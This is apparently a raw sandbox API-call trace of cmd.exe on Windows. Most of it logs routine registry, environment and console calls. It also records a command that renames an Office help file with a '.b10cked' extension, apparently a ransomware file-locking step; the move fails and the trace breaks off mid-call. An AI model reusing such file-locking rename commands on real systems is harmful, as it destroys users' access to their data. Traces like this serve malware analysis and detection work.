VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, 
Protect=0x4, Type=0x20000)) returned 0x1c [0202.875] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.875] GetConsoleOutputCP () returned 0x1b5 [0202.875] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.875] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.875] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.875] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.876] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.876] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.876] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.876] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.876] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.876] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.876] GetEnvironmentStringsW () returned 0x4c0190* [0202.877] FreeEnvironmentStringsW (penv=0x4c0190) returned 1 [0202.877] GetEnvironmentStringsW () returned 0x4c0190* [0202.877] FreeEnvironmentStringsW (penv=0x4c0190) returned 1 [0202.877] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb7c | out: phkResult=0x30eb7c*=0x40) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0xb8, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, 
lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x1, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x1, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x0, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x40, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x40, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x40, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegCloseKey (hKey=0x40) returned 0x0 [0202.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb7c | out: phkResult=0x30eb7c*=0x40) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x40, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: 
lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x1, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x1, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x0, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x9, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x9, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x9, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegCloseKey (hKey=0x40) returned 0x0 [0202.878] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.878] srand (_Seed=0x5b8863a4) [0202.878] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"" [0202.878] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"" [0202.878] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.878] 
GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.878] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.878] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.878] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.878] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.878] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.878] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.878] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.878] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.878] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.878] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.878] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.878] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.879] GetEnvironmentStringsW () returned 0x4c22e0* [0202.879] FreeEnvironmentStringsW (penv=0x4c22e0) returned 1 [0202.879] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.879] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.879] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.879] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.879] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 
[0202.879] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.879] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.879] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.879] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.879] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.879] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f948 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.879] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f948, lpFilePart=0x30f944 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f944*="Desktop") returned 0x18 [0202.879] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.879] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f6c4 | out: lpFindFileData=0x30f6c4) returned 0x4c0020 [0202.879] FindClose (in: hFindFile=0x4c0020 | out: hFindFile=0x4c0020) returned 1 [0202.879] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f6c4 | out: lpFindFileData=0x30f6c4) returned 0x4c0020 [0202.879] FindClose (in: hFindFile=0x4c0020 | out: hFindFile=0x4c0020) returned 1 [0202.879] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f6c4 | out: lpFindFileData=0x30f6c4) returned 0x4c0020 [0202.880] FindClose (in: hFindFile=0x4c0020 | out: hFindFile=0x4c0020) returned 1 [0202.880] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.880] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.880] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.880] GetEnvironmentStringsW () returned 0x4c2b00* [0202.880] FreeEnvironmentStringsW (penv=0x4c2b00) returned 1 
[0202.880] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.880] GetConsoleOutputCP () returned 0x1b5 [0202.881] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.881] GetUserDefaultLCID () returned 0x409 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fa88, cchData=128 | out: lpLCData="0") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fa88, cchData=128 | out: lpLCData="0") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fa88, cchData=128 | out: lpLCData="1") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.881] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.882] GetConsoleTitleW (in: lpConsoleTitle=0x4b08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.882] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.882] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.882] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.883] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.883] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.883] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.883] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.883] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.883] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.883] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.883] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.886] GetConsoleTitleW (in: lpConsoleTitle=0x30f780, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.886] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.886] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.886] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.886] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.886] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.886] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.886] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.886] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.886] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.886] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.886] _wcsicmp (_String1="move", _String2="SET") returned -6 
[0202.886] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.886] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.887] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.887] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.887] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.887] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.887] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.887] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.887] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.887] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.887] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.887] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.887] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.887] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.887] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.887] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.887] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.887] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.887] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.887] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.887] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.887] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.887] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.887] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.888] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.888] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.888] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f53c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f534, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: 
lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f534*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", 
_String2="Program", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.890] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.890] _wcsicmp (_String1="MSWINW~2.HXN", _String2=".") returned 63 [0202.890] _wcsicmp (_String1="MSWINW~2.HXN", _String2="..") returned 63 [0202.890] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinw~2.hxn")) returned 0x2022 [0202.890] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c1e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.890] SetErrorMode (uMode=0x0) returned 0x0 [0202.890] SetErrorMode (uMode=0x1) returned 0x0 [0202.890] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", nBufferLength=0x104, lpBuffer=0x30eec4, lpFilePart=0x30eeac | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", lpFilePart=0x30eeac*="MSWINW~2.HXN") returned 0x27 [0202.890] SetErrorMode (uMode=0x0) returned 0x1 [0202.890] 
GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.890] _wcsicmp (_String1="MSWINW~2.HXN", _String2=".") returned 63 [0202.890] _wcsicmp (_String1="MSWINW~2.HXN", _String2="..") returned 63 [0202.890] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinw~2.hxn")) returned 0x2022 [0202.891] SetErrorMode (uMode=0x0) returned 0x0 [0202.891] SetErrorMode (uMode=0x1) returned 0x0 [0202.891] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", nBufferLength=0x104, lpBuffer=0x30f340, lpFilePart=0x30f0d8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", lpFilePart=0x30f0d8*="MSWINW~2.HXN") returned 0x27 [0202.891] SetErrorMode (uMode=0x0) returned 0x1 [0202.891] SetErrorMode (uMode=0x0) returned 0x0 [0202.891] SetErrorMode (uMode=0x1) returned 0x0 [0202.891] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x30f548, lpFilePart=0x30f0d8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked", lpFilePart=0x30f0d8*="MS.WINWORD.DEV.14.1033.hxn.b10cked") returned 0x3d [0202.891] SetErrorMode (uMode=0x0) returned 0x1 [0202.891] SetLastError (dwErrCode=0x0) [0202.891] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.winword.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0202.891] GetLastError () returned 0x2 [0202.891] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x30ea54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ea54) returned 0x4b0e90 [0202.891] FindNextFileW (in: hFindFile=0x4b0e90, lpFindFileData=0x30ea54 | out: lpFindFileData=0x30ea54) returned 0 [0202.892] FindClose 
(in: hFindFile=0x4b0e90 | out: hFindFile=0x4b0e90) returned 1 [0202.892] GetLastError () returned 0x12 [0202.892] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x30ea54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ea54) returned 0x4b0e90 [0202.892] FindNextFileW (in: hFindFile=0x4b0e90, lpFindFileData=0x30ea54 | out: lpFindFileData=0x30ea54) returned 0 [0202.892] FindClose (in: hFindFile=0x4b0e90 | out: hFindFile=0x4b0e90) returned 1 [0202.892] GetLastError () returned 0x12 [0202.893] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x4c1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1bf8) returned 0x4b0e90 [0202.893] FindNextFileW (in: hFindFile=0x4b0e90, lpFindFileData=0x4c1bf8 | out: lpFindFileData=0x4c1bf8) returned 0 [0202.893] FindClose (in: hFindFile=0x4b0e90 | out: hFindFile=0x4b0e90) returned 1 [0202.893] GetLastError () returned 0x12 [0202.893] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x4c1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1bf8) returned 0x4b0e90 [0202.893] FindNextFileW (in: hFindFile=0x4b0e90, lpFindFileData=0x4c1bf8 | out: lpFindFileData=0x4c1bf8) returned 0 [0202.893] FindClose (in: hFindFile=0x4b0e90 | out: hFindFile=0x4b0e90) returned 1 [0202.893] GetLastError () returned 0x12 [0202.893] _get_osfhandle (_FileHandle=2) returned 0xb [0202.893] GetFileType (hFile=0xb) returned 0x2 [0202.916] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.916] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30ec24 | out: lpMode=0x30ec24) returned 1 [0202.916] _get_osfhandle (_FileHandle=2) returned 0xb [0202.916] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x30ec58 | out: 
lpConsoleScreenBufferInfo=0x30ec58) returned 1 [0202.916] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.917] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30ec98 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.918] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x30ec7c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30ec7c*=0x2c) returned 1 [0202.918] longjmp () [0202.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.918] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.918] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.918] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | 